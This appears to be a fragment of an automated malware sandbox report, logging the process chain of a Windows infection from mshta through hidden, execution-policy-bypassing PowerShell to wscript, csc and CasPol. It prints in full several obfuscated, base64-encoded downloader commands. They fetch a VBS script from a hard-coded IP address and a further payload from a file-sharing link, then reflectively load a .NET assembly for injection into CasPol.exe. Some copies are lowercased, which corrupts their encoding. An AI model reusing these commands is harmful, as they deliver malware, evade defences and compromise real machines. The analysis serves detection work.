MpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES59C4.tmp" "c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jepqemwgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrklvrzugugicagicagicagicagicagicagicagicagicagicagicatbuvtykvyzevmau5pvglptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb24ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbyvkzqy0wsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagz09oz0j5lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihhhlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbtaejpleludfb0ciagicagicagicagicagicagicagicagicagicagicagigzqt0vmktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiaxf3usigicagicagicagicagicagicagicagicagicagicagicattkfnrxnqyunlicagicagicagicagicagicagicagicagicagicagicageuziu21revdjicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrkuhpsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmtmyms9zzwv0agvizxn0dghpbmdzzw50axjldgltzxdoawnoz2l2zw5izxn0zgvzawduzm9yew91cnroaw5ncy50suyilcikru52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3agljagdpdmvuymvzdgrlc2lnbmzvcnlvdxj0ac52qnmildasmck7c1rbcnqtc2xlrxaomyk7sukgicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzxrozwjlc3r0agluz3nlbnrpcmv0aw1ld2hpy2hnaxzlbmjlc3rkzxnpz25mb3j5b3vydggudkjzig=='+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrqu2hvbuvbnf0rjhbtag9nzvszmf0rj1gnksgoj2uzjysnswltywcnkydlvxjsid0gsgv1ahr0chm6ly8zmta1lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1zafrqsgjdufg4by1st3rdcuhmrzzfjysnmhhdes14bdr0bnhsqvziutk1lwr2avrljysnnwnbumfozffqymizbwv4zndrekttvfhnjnnraxbyzwc9dhj1zszwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi1mzezmdlinwzmn2mgsgv1o2uzsxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7ztnjaw1hjysnz2vcexrljysncya9iguzsxdlyknsawvudc5eb3dubg9hzerhdgeoztnjaw1hz2vvcmwpo2uzswltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluzycrj106olvurjgur2v0u3ryaw5nkguzswltywdlqnl0zxmnkycpo2uzsxn0yscrj3j0rmxhzycrjya9iehldtw8qkftrty0x1nuqvjupj5izxu7ztnjzw5krmxhzya9jysniegnkydldtw8qkftrty0x0vord4+sgv1o2uzsxn0yxj0sw5kzxggpsblm0lpbwfnzvrlehqusw5kzxhpzihlm0lzdgfydezsywcpo2uzswvuzeluzgv4id0gztnjaw1hz2vuzxh0lkluzgv4t2yoztnjzw5krmxhzyk7ztnjc3rhcnrjbicrj2rlecatz2ugmcatyw5kiguzswvuzeluzgv4ic0nkydndcblm0lzdgfydeluzgv4o2uzsscrj3n0yxj0sw5kzxggkz0gztnjc3rhcnqnkydgbgfnlkxljysnbmd0adtlm0liyxnlnjrmzw5ndgggpsblm0llbmrjbmrlecatiguzsxn0yxj0sw5kzxg7ztmnkydjymfzzty0q29tbwfuzca9iguzswltywdlvgv4dccrjy5tdwjzdhjpbmcoztnjc3rhcnrjbmrlecwgztnjymfzzty0tgvuz3rokttlm0liyxnlnjrszscrj3ynkydljysncnnlzca9ic1qb2luichlm0liyxnlnjrdb21tyw5kllrvq2gnkydhckfycmf5kckga1vpiezvckvhy2gtt2jqzwn0ihsgztnjxyb9kvstms4ulshlm0liyxnlnjrdb21tyw5klkxlbmd0acldo2uzsscrj2nvbscrj21hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnlnjrtdhjpbmcozscrjznjymenkydzzty0umv2zxjzzwqpo2uzjysnswxvywrljysnzefzc2vtymx5id0gw1n5c3rljysnbs5sjysnzwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchlmycrj0ljb21tyw5kqnl0zxmpo2uzsxzhau1ldghvzcankyc9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qosgv1vkfjsgv1kttlm0l2ywlnzxrob2qusw52b2tlkguzsw51bgwsieaosgv1dhh0jysnlk1stufdlzeymzevntcxljq0lji3ms43mdevlzpwdhrosgv1lcbizxvkzxnhdgl2ywrvsgv1lcbizxvkzxnhdccrj2l2ywrvsgv1lcankydizxvkzxnhdgl2ywrvsgv1lcbizxvdyxnqb2xizxusiehldwrlc2f0axzhzg9izxusiehldwrlc2f0axzhzg9izxussgunkyd1zgvzyxrpdmfkbycrj0hldsxizxvkzxnhdgl2ywrvsgv1lehldwrlc2f0axzhzg9izxussgv1zgvzyxrpdmfkb0hldsxizxvkzxnhdgl2ywrvsgv1lehldtfizxussgv1zccrj2vzyxrpdmfkb0gnkydldskpoycplnjfugxhq0uokftjsefsxtcyk1tjsefsxtewmstby0hbul0xmtcplfttvfjjtkddw2niqvjdmzkplnjfugxhq0uokftjsefsxtewnytby0hbul04nstby0hbul0xmduplfttvfjjtkddw2niqvjdmti0ks5yrvbsyunfkcdlm0knlcckjykgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $pshome[4]+$pshome[30]+'x')(('e3'+'iimag'+'eurl = heuhttps://3105.filemail.com/api/file/get?filekey=shtphbcpx8o-lotcqhlg6_'+'0xcy-xl4tnxlavbq95-dvitk'+'5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c heu;e3iwebclient = new-object system.net.webclient;e3iima'+'gebyte'+'s = e3iwebclient.downloaddata(e3iimageurl);e3iimagetext = [system.text.encoding'+']::utf8.getstring(e3iimagebytes'+');e3ista'+'rtflag'+' = heu<<base64_start>>heu;e3iendflag ='+' h'+'eu<<base64_end>>heu;e3istartindex = e3iimagetext.indexof(e3istartflag);e3iendindex = e3iimagetext.indexof(e3iendflag);e3istartin'+'dex -ge 0 -and e3iendindex -'+'gt e3istartindex;e3i'+'startindex += e3istart'+'flag.le'+'ngth;e3ibase64length = e3iendindex - e3istartindex;e3'+'ibase64command = e3iimagetext'+'.substring(e3istartindex, e3ibase64length);e3ibase64re'+'v'+'e'+'rsed = -join (e3ibase64command.toch'+'ararray() kui foreach-object { e3i_ })[-1..-(e3ibase64command.length)];e3i'+'com'+'mandbytes = [system.'+'convert]::frombase64string(e'+'3iba'+'se64reversed);e3'+'iloade'+'dassembly = [syste'+'m.r'+'eflection.assembly]::load(e3'+'icommandbytes);e3ivaimethod '+'= [dnlib.io.home].getmethod(heuvaiheu);e3ivaimethod.invoke(e3inull, @(heutxt'+'.mrmac/1231/571.44.271.701//:ptthheu, heudesativadoheu, heudesat'+'ivadoheu, '+'heudesativadoheu, heucaspolheu, heudesativadoheu, heudesativadoheu,he'+'udesativado'+'heu,heudesativadoheu,heudesativadoheu,heudesativadoheu,heudesativadoheu,heu1heu,heud'+'esativadoh'+'eu));').replace(([char]72+[char]101+[char]117),[string][char]39).replace(([char]107+[char]85+[char]105),[string][char]124).replace('e3i','$') )"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jepqemwgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrklvrzugugicagicagicagicagicagicagicagicagicagicagicatbuvtykvyzevmau5pvglptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb24ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbyvkzqy0wsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagz09oz0j5lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihhhlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbtaejpleludfb0ciagicagicagicagicagicagicagicagicagicagicagigzqt0vmktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiaxf3usigicagicagicagicagicagicagicagicagicagicagicattkfnrxnqyunlicagicagicagicagicagicagicagicagicagicagicageuziu21revdjicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrkuhpsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmtmyms9zzwv0agvizxn0dghpbmdzzw50axjldgltzxdoawnoz2l2zw5izxn0zgvzawduzm9yew91cnroaw5ncy50suyilcikru52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3agljagdpdmvuymvzdgrlc2lnbmzvcnlvdxj0ac52qnmildasmck7c1rbcnqtc2xlrxaomyk7sukgicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzxrozwjlc3r0agluz3nlbnrpcmv0aw1ld2hpy2hnaxzlbmjlc3rkzxnpz25mb3j5b3vydggudkjzig=='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrqu2hvbuvbnf0rjhbtag9nzvszmf0rj1gnksgoj2uzjysnswltywcnkydlvxjsid0gsgv1ahr0chm6ly8zmta1lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1zafrqsgjdufg4by1st3rdcuhmrzzfjysnmhhdes14bdr0bnhsqvziutk1lwr2avrljysnnwnbumfozffqymizbwv4zndrekttvfhnjnnraxbyzwc9dhj1zszwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi1mzezmdlinwzmn2mgsgv1o2uzsxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7ztnjaw1hjysnz2vcexrljysncya9iguzsxdlyknsawvudc5eb3dubg9hzerhdgeoztnjaw1hz2vvcmwpo2uzswltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluzycrj106olvurjgur2v0u3ryaw5nkguzswltywdlqnl0zxmnkycpo2uzsxn0yscrj3j0rmxhzycrjya9iehldtw8qkftrty0x1nuqvjupj5izxu7ztnjzw5krmxhzya9jysniegnkydldtw8qkftrty0x0vord4+sgv1o2uzsxn0yxj0sw5kzxggpsblm0lpbwfnzvrlehqusw5kzxhpzihlm0lzdgfydezsywcpo2uzswvuzeluzgv4id0gztnjaw1hz2vuzxh0lkluzgv4t2yoztnjzw5krmxhzyk7ztnjc3rhcnrjbicrj2rlecatz2ugmcatyw5kiguzswvuzeluzgv4ic0nkydndcblm0lzdgfydeluzgv4o2uzsscrj3n0yxj0sw5kzxggkz0gztnjc3rhcnqnkydgbgfnlkxljysnbmd0adtlm0liyxnlnjrmzw5ndgggpsblm0llbmrjbmrlecatiguzsxn0yxj0sw5kzxg7ztmnkydjymfzzty0q29tbwfuzca9iguzswltywdlvgv4dccrjy5tdwjzdhjpbmcoztnjc3rhcnrjbmrlecwgztnjymfzzty0tgvuz3rokttlm0liyxnlnjrszscrj3ynkydljysncnnlzca9ic1qb2luichlm0liyxnlnjrdb21tyw5kllrvq2gnkydhckfycmf5kckga1vpiezvckvhy2gtt2jqzwn0ihsgztnjxyb9kvstms4ulshlm0liyxnlnjrdb21tyw5klkxlbmd0acldo2uzsscrj2nvbscrj21hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnlnjrtdhjpbmcozscrjznjymenkydzzty0umv2zxjzzwqpo2uzjysnswxvywrljysnzefzc2vtymx5id0gw1n5c3rljysnbs5sjysnzwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchlmycrj0ljb21tyw5kqnl0zxmpo2uzsxzhau1ldghvzcankyc9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qosgv1vkfjsgv1kttlm0l2ywlnzxrob2qusw52b2tlkguzsw51bgwsieaosgv1dhh0jysnlk1stufdlzeymzevntcxljq0lji3ms43mdevlzpwdhrosgv1lcbizxvkzxnhdgl2ywrvsgv1lcbizxvkzxnhdccrj2l2ywrvsgv1lcankydizxvkzxnhdgl2ywrvsgv1lcbizxvdyxnqb2xizxusiehldwrlc2f0axzhzg9izxusiehldwrlc2f0axzhzg9izxussgunkyd1zgvzyxrpdmfkbycrj0hldsxizxvkzxnhdgl2ywrvsgv1lehldwrlc2f0axzhzg9izxussgv1zgvzyxrpdmfkb0hldsxizxvkzxnhdgl2ywrvsgv1lehldtfizxussgv1zccrj2vzyxrpdmfkb0gnkydldskpoycplnjfugxhq0uokftjsefsxtcyk1tjsefsxtewmstby0hbul0xmtcplfttvfjjtkddw2niqvjdmzkplnjfugxhq0uokftjsefsxtewnytby0hbul04nstby0hbul0xmduplfttvfjjtkddw2niqvjdmti0ks5yrvbsyunfkcdlm0knlcckjykgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $pshome[4]+$pshome[30]+'x')(('e3'+'iimag'+'eurl = heuhttps://3105.filemail.com/api/file/get?filekey=shtphbcpx8o-lotcqhlg6_'+'0xcy-xl4tnxlavbq95-dvitk'+'5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c heu;e3iwebclient = new-object system.net.webclient;e3iima'+'gebyte'+'s = e3iwebclient.downloaddata(e3iimageurl);e3iimagetext = 